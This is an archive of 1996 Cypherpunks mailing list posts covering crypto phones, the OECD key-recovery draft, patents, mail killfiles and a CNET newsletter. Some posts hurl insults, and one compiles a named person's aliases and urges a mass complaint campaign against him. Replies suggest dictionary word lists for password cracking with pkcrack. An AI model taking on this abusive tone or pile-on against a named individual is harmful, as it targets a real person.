   Internet rules of conduct."

Wasn't it you who claimed that cypherpunks was "public domain" because
of just some such "InterNet" rule?

   He who tries to make or enforce any rules DIES!

Is that a rule? :-)

   > I would encourage other Cypherpunks to do the same. 

   Yeah boy, you are a PUNK allright.

And you're a hypocritical fascist asshole.  So what?

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
I feel like I am sharing a ``CORN-DOG'' with NIKITA KHRUSCHEV ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 21 Nov 1996 17:23:33 -0800 (PST)
To: Mullen Patrick <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: RE: Mass-market crypto phones
In-Reply-To: <n1363530815.90062@mail.ndhm.gtegsc.com>
Message-ID: <Pine.3.89.9611211658.A10580-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On 21 Nov 1996, Mullen Patrick wrote:

> _______________________________________________________________________________
> From: Clay Olbon II on Thu, Nov 21, 1996 15:20
> 
> >A while back, Eric Blossom posted a URL for a mass-market, phone encyrption
> >device (http://www.comsec.com/).  The point of this post is to posit a
> 
> The above mentioned crypto phone was incredibly expensive, if I remember
> correctly.  What it basically was (Please keep in mind I may be thinking
> of a different product) a box containing a modem and a crypto-crunching
> CPU.  Phone in one end, processed by said CPU, and send out other end.  I
> have/had a similar idea, but I want to try make it a totally software 
> product (assuming you have the necessary hw requirements on your computer)
> where you talk in through a microphone (can something be wired so you can
> use a regular phone plugged into your computer/modem/soundcard???) your
> CPU crunches code, and spits out the encrypted data.  Obviously, the
> complementing steps would be done on the receiving end.  
> Has anyone ever tried anything like this?  

Sure. There are Nautilus and PGPFone. The problem is that software-only
solutions are unlikely to provide a sound quality that is acceptable for
everyday use over analog lines. At least not unless you have a very fast
machine and don't intend to use it for anything else than telephony. Here
is why: 

Computer telephony codecs are subject to a tradeoff amongst three main 
factors:

o Voice quality (you want to maximize this)
o Processing power required (you want to minimize this)
o Bandwidth (you definitely want to minimize this)

Imagine the three factors to form the dimensions of a cube. You can get
the choose two values, but not all three. Example: you can get good voice
quality on a machine with a (relatively) slow CPU, if you have a lot of
bandwidth. Or you can get good voice quality on a very fast machine with
little bandwidth. Of the three factors, band with is the most limiting. 
The best codec in the word on the fastest machine can't give you decent
voice quality on a very slow connection. 

So how much bandwidth do you need? An ISDN B-channel, which is designed to
carry one digital telephone conversation, is 64kbps. But a regular POTS
telephone, using an analog line, doesn't have nearly as much bandwidth to
work with. You should not expect an analog modem to link up at a speed of
more than 14.4kpbs. Some lines may link up at only 9600bps.  Forget about
the less than 10% of US phone lines that allow the use of 28.8kbps. You
can't rely on your customers to use your product only over such lines. 

The first problem is therefore to find a software codec that compresses 
your voice down to 14.4kbps. They exist, but they require a lot of 
computations and therefore a fast CPU.

But that's only half the problem. Next, you need to encrypt the 
data steam. The rule of thumb here is: the stronger the crypto, the more 
cycles you need. Since we are talking about strong crypto, such as 
3DES, you will need _a lot_ of cycles.

Once you add the cycles needed by the codec and the cycles needed by the 
crypto, you will find that you, more likely than not, don't get enough 
cycles from your CPU. The obvious solution to this problem is to use a 
codec that uses lossier compression and therefore less cycles, resulting in 
lower speech quality.

Even after sacrificing voice quality, telephony is most likely the only 
task your computer will be able to do while you are on the phone. This 
may work for you, but it won't work for many others. After all, not
many people have a spare 200MHz Pentium sitting around that they don't 
need for anything else.

The alternative is to use dedicated hardware. Remember that a general
purpose CPU is just that: general purpose. If you want to use the box only
for one purpose, there is often a cheaper, better solution available in
special purpose hardware. For the price of the Pentium box, you can build
a much smaller bump-in-the-cord device that delivers great sound, over
slow links, *and* uses strong crypto.

Which is what Eric Blossom <http://www.comsec.com/> did. And he did 
it extremely well, I'd like to add.

I don't want to discourage you. Try the software-only solutions and see 
if they work you. You can find them at 
<ftp://ftp.hacktic.nl/pub/replay/pub/voice/>

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 21 Nov 1996 18:47:11 -0800 (PST)
To: gbroiles@netbox.com (Greg Broiles)
Subject: Re: killfiling aga@dhp.com
In-Reply-To: <3.0b28.32.19961121105128.006fd704@ricochet.net>
Message-ID: <199611212322.RAA01823@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Greg Broiles wrote:
> 
> At 06:45 AM 11/21/96 -0800, nobody@cypherpunks.ca (John Anonymous
> MacDonald) wrote:
> [discussing aga@dhp.com]
> >I should'a kill-filed this sicko long ago.
> 
> Agreed. But if you (and other anonymous posters) are going to continue to
> reply to him or other unproductive kooks, would you please put their
> addresses somewhere in the headers of your messages (perhaps in the To: or
> Cc: or Subject:) headers so that the rest of us who are using killfiles
> won't have to read your replies? 

If you use procmail, you can use the following entry to support 
cypherpunks-specific killfile: 

:0
* ^(Sender|From): owner-cypherpunks@toad.com
{
  :0 BHc:
  * !? fgrep -q -i -f $HOME/.procmail/killfile.cpunks
  $MAILDIR/crypto.noflames

  .. some more irrelevant recipes ..
}

Then create ~/.procmail and edit file $HOME/.procmail/killfile.cpunks.
Put there something like

someone@you.want.to.ignore
freedom-knights
someone@else

and so on. This recipe will trash everything with the specified 
addresses mentioned in headers and bodies of incoming cypherpunks
articles. I experimented with this recipe at the height of the f-k
vs. cypherpunks flamewar. It reduced the traffic in half and what 
remained was much more useful.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 21 Nov 1996 17:31:45 -0800 (PST)
To: "Alan Pugh" <cypherpunks@toad.com
Subject: Re: Patent Fight Could Add to Cost of Inter
Message-ID: <199611220131.RAA28545@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 AM 11/21/96 CST, Alan Pugh wrote:
>
>By KATHLEEN SAMPEY 
>Associated Press Writer 
>
>NEW YORK (AP) _ A little-known patent could raise the cost of 
>doing business over the Internet for companies selling software, 
>video or other digital products delivered online. 
>
>E-Data Corp. of Secaucus, N.J., is suing 17 companies, including 
>McGraw-Hill and CompuServe, to collect licensing fees on the 
>patent, which protects downloading of encrypted digital 
>information. A court hearing is scheduled Dec. 6 in New York on the 
>company's claims. 


Notice, as usual, the Orwellian use of the word "protects" in the paragraph 
above.  While apparently written by a journalist, it echoes the usage of 
lawyers.  Nothing is really being "protected," it is being monopolized.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Thu, 21 Nov 1996 14:29:01 -0800 (PST)
To: kb4vwa@juno.com (Edward R. Figueroa)
Subject: Re: Word Lists
Message-ID: <3.0.32.19961121172905.00696630@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:40 PM 11/21/96, you wrote:
:I'm looking for a Large Word List, for a pkcrack program.
:
:Anyone have any idea where to find one, or how to convert a dictionary
:formated file to a wordlist file?
:
:Ed
:
http://world.std.com/~reinhold/diceware.wordlist.asc

This is the wordlist for Diceware, and I quote, "7776 short English words,
abbreviations and easy to remember character strings. The average length of
each word is about 4.2 characters. The biggest words are six characters long.

The list is based a longer word list posted to the Internet news group
sci.crypt by Peter Kwangjun Suk."

This may not be long enough for your needs.

The address of the Diceware page is 

http://world.std.com/~reinhold/diceware.page.html

Good luck.

Cordially,

Alec                   

PGP Fingerprint:
Type bits/keyID    Date       User ID
pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
          Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Thu, 21 Nov 1996 18:36:12 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: wealth and property rights
Message-ID: <199611220235.SAA02028@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> Btw, people of your mentality (communists/socialists) already make it
> very difficult for me to accumulate, due to the exhorbitant tax rates
> to support those who chose to blow their money as soon as they have
> it

I don't necessarily want to support "socialism" nor "capitalism". Both
are extremes of a situation which does no one any good to exist. 

However, I would question the implication that "socialists" are
responsible for the higher tax rates you currently experience.  

For example, I could make a strong case that you really have some
clever "capitalists" who have learned how to express their
"capitalism" quite effectively across the space of all people in a
"country".

8-)
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

         It is the wise bird who builds his nest in a tree.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The CNET newsletter <dispatch@cnet.com>
Date: Thu, 21 Nov 1996 19:23:56 -0800 (PST)
To: Multiple recipients of list NEWS-DISPATCH             <NEWS-DISPATCH@DISPATCH.CNET.COM>
Subject: CNET News Dispatch  November 21st, 1996
Message-ID: <199611220304.TAA05423@lorelei.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


*************************************

CNET NEWS DISPATCH/SPECIAL COMDEX ISSUE
Thursday, November 21, 1996
San Francisco, California, USA

*************************************

Welcome to the fifth in a series of SPECIAL COMDEX ISSUES of the CNET NEWS
DISPATCH, bringing you the latest on the people, products, and parties at
this exciting event. Check out our Comdex page at:

http://www.news.com/Categories/Index/0%2C3%2C38%2C00.html?nd

*************************************

CNET NEWS DISPATCH is a daily newsletter that summarizes the up-to-the
minute technology news presented by CNET's NEWS.COM. It tempts readers with
coverage of today's hottest stories, news in the making, (in)credible
rumors, and other indispensable information.

For complete versions of the stories updated all day long, head over to:

   http://www.news.com/?nd

*************************************

CONTENTS

SCOOPS AND TOP STORIES
       Push comes to shove as Netscape leads tech parade
       CompuServe gets back to basics
       PowerPC not overshadowed at Comdex
       Treasury against Net taxes
       Compaq looks beyond the desktop
       Where do you want to go today? Home.
       Hot products seen at Comdex

ANNOUNCEMENTS
       An easy way for you to customize NEWS.COM
       Search the site for particular topics and articles
       Send us your questions, comments, flotsam, and jetsam
       How to subscribe and unsubscribe
       Late-breaking stories just a click away with Desk Top News

*************************************

PUSH COMES TO SHOVE AS NETSCAPE LEADS TECH PARADE
As more and more people are pulled onto the Internet, more and more of the
Internet is being pushed back to people. This week at Comdex, a type of Web
publishing generically referred to as "push" technology received its most
significant endorsement to date with the introduction of Constellation, the
code name for a new technology from Netscape Communications. (November 21,
1996, 12:15 p.m. PT)

   http://www.news.com/News/Item/0%2C4%2C5641%2C00.html?nd


COMPUSERVE GETS BACK TO BASICS
CompuServe's announcement today that it is closing down its flagging Wow
service by January 31 marks the end of the company's failed attempts to get
a foot in the door of the potentially lucrative consumer online service
business. "They're throwing in the towel in the consumer market," said Mark
Mooradian of Jupiter Communications. Instead, CompuServe, the second-largest
online service with 5 million users worldwide, plans to refocus itself on
its original mission: serving business customers. (November 21, 1996, 1:15
p.m. PT)

   http://www.news.com/News/Item/0%2C4%2C5608%2C00.html?nd


POWERPC NOT OVERSHADOWED AT COMDEX
While Microsoft Windows CE devices may have grabbed most of the attention at
Comdex, important developments in the Mac clone market surfaced, including
new PowerPC reference design platforms from Motorola and IBM and the debut
of a 533-MHz PowerPC prototype system using an Exponential processor.
Motorola this week revealed its Yellowknife PowerPC Platform Reference
Design motherboard that supports the PCI bus and 603e, 604, and 604e PowerPC
microprocessors at clock speeds of up to 240 MHz. (November 21, 1996, 12
p.m. PT)

   http://www.news.com/News/Item/0%2C4%2C5642%2C00.html?nd


TREASURY AGAINST NET TAXES
In a report released today, the U.S. Treasury Department opposed new taxes
on electronic transactions via the Internet, saying income should be taxed
the same whether it comes through existing channels or electronic means. The
report, which makes no formal policy recommendations, also expresses concern
that the Internet may become a tax haven for those who use anonymous
electronic money that cannot be traced and therefore cannot be taxed.
(November 21, 1996, 11:30 a.m. PT)

   http://www.news.com/News/Item/0%2C4%2C5628%2C00.html?nd


COMPAQ LOOKS BEYOND THE DESKTOP
Compaq has expanded its core desktop product lineup to include new efforts
such as NetPCs, network computers (NCs), portable PCs, and handheld devices.
Mike Winkler, the head of Compaq's PC products group, bared the company's
plans for NCs and laid out the future strategy for Windows CE devices in an
interview with CNET at Comdex. (November 21, 1996, 11:15 a.m. PT)

   http://www.news.com/News/Item/0%2C4%2C5645%2C00.html?nd


WHERE DO YOU WANT TO GO TODAY? HOME
Bill Gates must like Comdex. While other CEOs will fly in to deliver a
speech and fly back out the same day, the Microsoft captain has been in Las
Vegas for at least two days, maybe more. "I've seen him in the hotel bar; he
comes in and has a beer all by himself, and everyone's looking at him," said
one attendee. But like sightings of the Other King, rumors of Gates's
unattended wanderings are probably just that. (November 21, 12:09 a.m. PT)

   http://www.news.com/SpecialFeatures/0%2C%2C5624%2C00.html?nd


HOT PRODUCTS SEEN AT COMDEX
Here are some of the hottest new products we found as we wandered the floor
of Fall Comdex. (November 21, 3:00 p.m. PT)

   http://www.cnet.com/Content/Reviews/Hot/contents.html?nd


*************************************

ANNOUNCEMENTS

AN EASY WAY FOR YOU TO CUSTOMIZE NEWS.COM
So many bits, so little time? Sounds like you need Custom News. Identify the
topics, keywords, or sections you're most interested in, and Custom News
will a create a page of headlines and summaries for all stories that match
your criteria. Check it out at:

http://www.news.com/Personalization/Entry/1%2C21%2C%2C00.html?nocache=1


SEARCH THE SITE FOR PARTICULAR TOPICS AND ARTICLES
Search the entire NEWS.COM database for stories you saw in News Dispatch, or
track any story we've run.

   http://www.news.com/Searching/Entry/0%2C17%2C0%2C00.html?nd


SEND US QUESTIONS, COMMENTS, FLOTSAM, AND JETSAM
If you have any questions, suggestions or remarks, send us a message:

   newsdispatch@cnet.com


HOW TO SUBSCRIBE AND TO UNSUBSCRIBE
To subscribe to News Dispatch: Send mail to listserv@dispatch.cnet.com with
the message:

   subscribe news-dispatch (your name)

in the message body. To unsubscribe send the message:

   unsubscribe news-dispatch


LATE-BREAKING STORIES JUST A CLICK AWAY WITH DESK TOP NEWS
How would you like having split-second access to the very latest news on the
Net? Our Desk Top News feature puts our 20 most recent stories right there
on your desktop for you to review at any time. Here's how it works:

1. From any story, click Desk Top News in the top right.
2. A window will open showing our last 20 stories.
3. Click on a headline to display the story.
4. Desk Top News updates itself every 30 minutes.
5. You become known as Ms./Mr. Cyber-Info. It feels good.

   http://www.news.com/Help/Item/0%2C24%2C12%2C00.html?nd


*************************************

CNET: The Computer Network
   http://www.cnet.com/
   http://www.news.com/
   http://www.gamecenter.com/
   http://www.download.com/
   http://www.search.com/
   http://www.shareware.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Thu, 21 Nov 1996 10:07:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anderson & Kuhn's "Improved DFA" paper
In-Reply-To: <1.5.4.32.19961121080842.003dcb34@popd.ix.netcom.com>
Message-ID: <Pine.HPP.3.91.961121190800.2140A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996 stewarts@ix.netcom.com wrote:

> Anderson&Kuhn just announced the latest in a series of attacks on 
> "tamperproof" hardware crypto modules by Israeli, UK, and US cryptographers.

You forgot the Belgians (or is Jean-Jacques Quisquater French?).

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 21 Nov 1996 16:43:05 -0800 (PST)
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Alias list for killfiling Grubor
Message-ID: <Pine.SCO.3.93.961121181231.13502H-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


For those who haven't explored the rich, sick history of John M. Grubor
(aka "aga@dhp.com"), he uses a variety of aliases.  While the "aga"
account seems popular right now, he usually pops over to another when his
killfile ratio gets too high.

To help save time and effort, the following is offered from the Grubor FAQ
that circulates on the Net with some regularity (look in 
alt.bonehead.john-grubor or alt.general.grubor):

Grubor has used, and continues to use, many aliases; usually through free
trial AOL, Prodigy or Compuserve accounts; but he has also paid for many
accounts on local providers. 

Some of Grubor's aliases: 

-manus@manus.org (his vanity domain)
-anything else at manus.org
-drg@telerama.lm.com (likely dead)    
-various pgh.org addresses (apparently another vanity account)
-Zeus (an usaor.net account, now dead)
-maryjane (a Compuserve address, dead)
-DrMacho (drmacho@pgh.nauticom.net, dead)
-Vwqe99b@prodigy.com (formerly using the alias "Amy Martin" now "Stanley
 Brown"; one of two accounts used for posting the infamous "List of
 Homosexuals in the Internet"--not dead, but rarely used) 
-Law Doctor or Doctor of Law used with his drg@manus.org and 
 drg@pgh.nauticom.net (dead) accounts
-two other AOL accounts--lawsystems@ and jgrubor@--are dead.
-aga@dhp.com (still active, but rarely used)
-zando@ix.netcom.com  (a former favorite, likely dead.  He used many
different  aliases with this one claiming alternately that this account
belongs to his mother and his wife.  All indications are that he is the
only one who used it.) 

He has also used CyberLawMaster, Lord Grubor, Lord Grub, and others with
his manus.org and ix.netcom.com addresses.  He morphs his aliases
frequently in an admitted attempt to foil killfiles. 

Possible aliases/morph accounts are:
-nancybett@aol.com (dead) 

All other accounts are generally verified as belonging to Grubor or not
rather quickly.

<end FAQ extract>

He is now also using "drgrubor@aol.com".  Because AOL will toss him fairly
quickly if he's too abusive (and he's already posting under that ID using
"cunt" and "cock" references), he'll probably not morph over there with
the idiocy he's been posting here.  If he does post from that account, I'd
suggest a mass mailing to AOL the moment it happens. 

He's got a KOTM award, but the small blurbs they publish don't do justice
to this small and pathetic little man.  He posts CONSTANTLY to the Usenet,
so checking things like DejaNews will help identify if it's really him
(his volume of posts seems to _never_ be what you'd call "lite").  His DHP
(DataHaven Project) domain is run by two hackers, Wipeout and Panzer Boy. 
Can't say anything based on fact, but I'd say that from their Web pages
that they aren't likely to really care what he says and aren't going to
respond to complaints sent to "postmaster@dhp.com".  If someone with
accurate info on who's selling line time to DHP can poney up a responsible
party to whom complaints can be sent, that might help. 

Now, if we could just get this Grubor weenie hooked up with Helena Kobrin,
maybe they could cause some impossible "stupidity polarization" and set
off an implosion that will drive both of them straight to hell and forever
off the face of the Earth.  Where's Jim Bell when you need him? 

------------------------------------------------------------------------- 
|It's a small world and it smells bad     |        Mark Aldrich         |
|I'd buy another if I had                 |   GRCI INFOSEC Engineering  |
|Back                                     |     maldrich@grci.com       |
|What I paid                              | MAldrich@dockmaster.ncsc.mil|
|For another mother****er in a motorcade  |Quote from "Sisters of Mercy"|
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 21 Nov 1996 11:35:54 -0800 (PST)
To: "Edward R. Figueroa" <kb4vwa@juno.com>
Subject: Re: Word Lists
In-Reply-To: <19961121.134031.7791.4.kb4vwa@juno.com>
Message-ID: <Pine.BSI.3.95.961121191801.7460C-100000@usr09.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996, Edward R. Figueroa wrote:

> I'm looking for a Large Word List, for a pkcrack program.
> 
> Anyone have any idea where to find one, or how to convert a dictionary
> formated file to a wordlist file?
> 

	find a source code copy of unix and find the spelling routine;
    there is a list of approximately 60K base words.  the code has an
    function which checks prefixes, suffixes, variations, etc. I have
    not looked to see if spell is included with "modern" versions of
    unix since the spell code is early 70s --it was in V6. It was also
    included in BSD4.1a/4.2+. 

	I have all of 'em for the last 25 years, in storage somewhere
    --and have not fired over my ancient Pertec 800/1600 open reel 9 track
    tape drive in years! --or I would lift one off for you.

	I do not know of a routine which generates "valid" prefixes,
    suffixes, and the like which would be useful in password cracking
    routines.

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 21 Nov 1996 11:48:20 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: killfiling aga@dhp.com
In-Reply-To: <3.0b28.32.19961121105128.006fd704@ricochet.net>
Message-ID: <Pine.BSI.3.95.961121193908.7460D-100000@usr09.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996, Greg Broiles wrote:

> At 06:45 AM 11/21/96 -0800, nobody@cypherpunks.ca (John Anonymous
> MacDonald) wrote:
> [discussing aga@dhp.com]
> >I should'a kill-filed this sicko long ago.
> 
> Agreed. But if you (and other anonymous posters) are going to continue to
> reply to him or other unproductive kooks, would you please put their
> addresses somewhere in the headers of your messages (perhaps in the To: or
> Cc: or Subject:) headers so that the rest of us who are using killfiles
> won't have to read your replies? 
> 
	all the remailers I know strip the headers except the subject. 

	If you put another header type line in the body of the text, it
    will still be there --in the body which means your filter does a great
    number of CPU cylces unnecessary.  Suggest: 

	    Subject: [aga@] whatever the current smoke....

    which should pass most of the garden variety remailers. 

	Personally, I think he's so far out, he is almost more humouress
    than he is ignorant, but he's been procmailed....

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 21 Nov 1996 19:23:10 -0800 (PST)
To: maldrich@grci.com
Subject: Re: Alias list for killfiling Grubor
In-Reply-To: <Pine.SCO.3.93.961121181231.13502H-100000@grctechs.va.grci.com>
Message-ID: <199611220304.VAA02832@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr. John Martin Grubor is the most harmless and most entertaining 
among all kooks.

His posting volume is a bit high, but other than that DrG never
got anyone in trouble.

igor

Mark O. Aldrich wrote:
> 
> For those who haven't explored the rich, sick history of John M. Grubor
> (aka "aga@dhp.com"), he uses a variety of aliases.  While the "aga"
> account seems popular right now, he usually pops over to another when his
> killfile ratio gets too high.
> 
> To help save time and effort, the following is offered from the Grubor FAQ
> that circulates on the Net with some regularity (look in 
> alt.bonehead.john-grubor or alt.general.grubor):
> 
> Grubor has used, and continues to use, many aliases; usually through free
> trial AOL, Prodigy or Compuserve accounts; but he has also paid for many
> accounts on local providers. 
> 
> Some of Grubor's aliases: 
> 
> -manus@manus.org (his vanity domain)
> -anything else at manus.org
> -drg@telerama.lm.com (likely dead)    
> -various pgh.org addresses (apparently another vanity account)
> -Zeus (an usaor.net account, now dead)
> -maryjane (a Compuserve address, dead)
> -DrMacho (drmacho@pgh.nauticom.net, dead)
> -Vwqe99b@prodigy.com (formerly using the alias "Amy Martin" now "Stanley
>  Brown"; one of two accounts used for posting the infamous "List of
>  Homosexuals in the Internet"--not dead, but rarely used) 
> -Law Doctor or Doctor of Law used with his drg@manus.org and 
>  drg@pgh.nauticom.net (dead) accounts
> -two other AOL accounts--lawsystems@ and jgrubor@--are dead.
> -aga@dhp.com (still active, but rarely used)
> -zando@ix.netcom.com  (a former favorite, likely dead.  He used many
> different  aliases with this one claiming alternately that this account
> belongs to his mother and his wife.  All indications are that he is the
> only one who used it.) 
> 
> He has also used CyberLawMaster, Lord Grubor, Lord Grub, and others with
> his manus.org and ix.netcom.com addresses.  He morphs his aliases
> frequently in an admitted attempt to foil killfiles. 
> 
> Possible aliases/morph accounts are:
> -nancybett@aol.com (dead) 
> 
> All other accounts are generally verified as belonging to Grubor or not
> rather quickly.
> 
> <end FAQ extract>
> 
> He is now also using "drgrubor@aol.com".  Because AOL will toss him fairly
> quickly if he's too abusive (and he's already posting under that ID using
> "cunt" and "cock" references), he'll probably not morph over there with
> the idiocy he's been posting here.  If he does post from that account, I'd
> suggest a mass mailing to AOL the moment it happens. 
> 
> He's got a KOTM award, but the small blurbs they publish don't do justice
> to this small and pathetic little man.  He posts CONSTANTLY to the Usenet,
> so checking things like DejaNews will help identify if it's really him
> (his volume of posts seems to _never_ be what you'd call "lite").  His DHP
> (DataHaven Project) domain is run by two hackers, Wipeout and Panzer Boy. 
> Can't say anything based on fact, but I'd say that from their Web pages
> that they aren't likely to really care what he says and aren't going to
> respond to complaints sent to "postmaster@dhp.com".  If someone with
> accurate info on who's selling line time to DHP can poney up a responsible
> party to whom complaints can be sent, that might help. 
> 
> Now, if we could just get this Grubor weenie hooked up with Helena Kobrin,
> maybe they could cause some impossible "stupidity polarization" and set
> off an implosion that will drive both of them straight to hell and forever
> off the face of the Earth.  Where's Jim Bell when you need him? 
> 
> ------------------------------------------------------------------------- 
> |It's a small world and it smells bad     |        Mark Aldrich         |
> |I'd buy another if I had                 |   GRCI INFOSEC Engineering  |
> |Back                                     |     maldrich@grci.com       |
> |What I paid                              | MAldrich@dockmaster.ncsc.mil|
> |For another mother****er in a motorcade  |Quote from "Sisters of Mercy"|
> |_______________________________________________________________________|
> |The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
> |    The opinions expressed herein are strictly those of the author     |
> |         and my employer gets no credit for them whatsoever.           |
> -------------------------------------------------------------------------
> 
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robin Whittle" <firstpr@ozemail.com.au>
Date: Thu, 21 Nov 1996 02:24:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Draft OECD crypto guidelines on WWW
Message-ID: <199611211023.VAA02305@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


I have obtained the OECD draft crypto guidelines from:

   http://www.quintessenz.at/Netzteil/OECD/index.html

where they are a Word 6 file.  I have converted them to HTML and put
them at:

   http://www.ozemail.com.au/~firstpr/crypto/oecd_dr.htm

This is probably not the absolute latest draft, but it is the best I
can get.

I think there is a lot of good material here, but they still seem
wedded to the idea of key-recovery or some other means of governments
accessing plaintext or keys.  They seem to assume there will always be
a copy of the key around the place somewhere.  In general, in the
future cryptographic exchanges will use fresh key-pairs for each
session, so not even the user can get a copy of the private key. Maybe
key-recovery techniques are designed to cope with this, but the
question is why would anyone want to use such a system other than that
the government (and some corporations aligned with the government)
want them to?

There is no reason why ordinary or criminal users should be
interested in key recovery/escrow, or weakened key-spaces - what they
need is simple to use, totally secure, end-to-end encryption.  The
whole aim is to make a bulletproof secure pipe that doesn't depend on
any other data, technology or administrative actions.


The draft guidelines have my comments at the start, including a
suggested rewording of paragraph 88 which currently states that
crypto systems *should* provide for lawful access to the
plaintext/key.  

The OECD people do not seem to have considered the fact that
criminals will wrap their material in a crypto system they can trust
before putting it through the government mandated system that they
don't trust. My comments include a more detailed discussion of this
argument, particularly in the situation where criminals are
communicating with non-criminals.  


   In a nutshell, how is all the cost, risk, doubt and 
   complication of key escrow/recovery etc. justified by its 
   benefits for serious crime prevention/deterrence, when the 
   great majority of criminals and a large number of ordinary 
   private and commercial users will be applying their own 
   strong encryption first?

Does anyone know of writing that specifically tackles this question?

This is a separate question from those about whether governments can
be trusted, or about absolute rights to privacy etc.  It is simply a
cost/benefit analysis.  To me the benefits for reducing serious crime
seem slim indeed and the costs - not least the general feeling that
people may be using daily a system specifically designed for tapping
their communications - seem to be very high.


- Robin

. Robin Whittle                                               .
. http://www.ozemail.com.au/~firstpr   firstpr@ozemail.com.au .
. 11 Miller St. Heidelberg Heights 3081 Melbourne Australia   .
. Ph +61-3-9459-2889    Fax +61-3-9458-1736                   .
. Consumer advocacy in telecommunications, especially privacy .
.                                                             .
. First Principles      - Research and expression - music,    .
.                         music industry, telecommunications  .
.                         human factors in technology adoption.
.                                                             .
. Real World Interfaces - Hardware and software, especially   .
.                         for music                           .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Norman Hardy <norm@netcom.com>
Date: Thu, 21 Nov 1996 21:59:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Computer CPU chips with built-in crypto?
Message-ID: <v03007801aebaec1fa54b@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


An important paper on tamper-proof hardware, discusses CPUs that cypher
their memory bus.

html:           www.cl.cam.ac.uk/users/rja14/tamper.html
postscript      ftp.cl.cam.ac.uk/users/rja14/tamper.ps.gz

Has special relevance to smart cards.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 21 Nov 1996 22:06:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: sci fi
Message-ID: <199611220550.VAA01019@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Without a doubt contemporary SciFi authors such as Vinge and Stephenson have produced
great thought provoking works. Always a good read. 

But sometimes I'm drawn back to the rollicking rampages of EE Doc Smith or the playful
frollicks of Harry Harrison. While not presenting a plausible vision of our future
they do offer a significant amount of enjoyment. Pure brain candy!

So will some exceptionally creative sort spend 3 or 4 hundred pages exploring
BlackNet and the future of global networking? 

Or has anyone looked at what has happened to trivial networks like 
IRC's EFnet to see a potential model for how global networking will become 
balkanized under bandwidth constraints, server cycle shortages,
and over worked sysadmins? One physical connection and many virtual,
private networks with limitted interoperability and crossover. The internet of
the near future may not be the open paradise it is today.

I read in InfoWorld that the Telco Dereg act may destroy the local loop market
for T1 lines from LD COs. As many as 900,000 new T1's may become available at bargain
rates on the order of $40 per month with end point hardware under $700. Watch 
PairGain Technologies as they are the leader in this hardware market and have
some real interesting vox/data over twisted pair toys.

Sheesh, I start out talking SciFi and end up talking PairGain! I guess the future
is now.

diGriz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
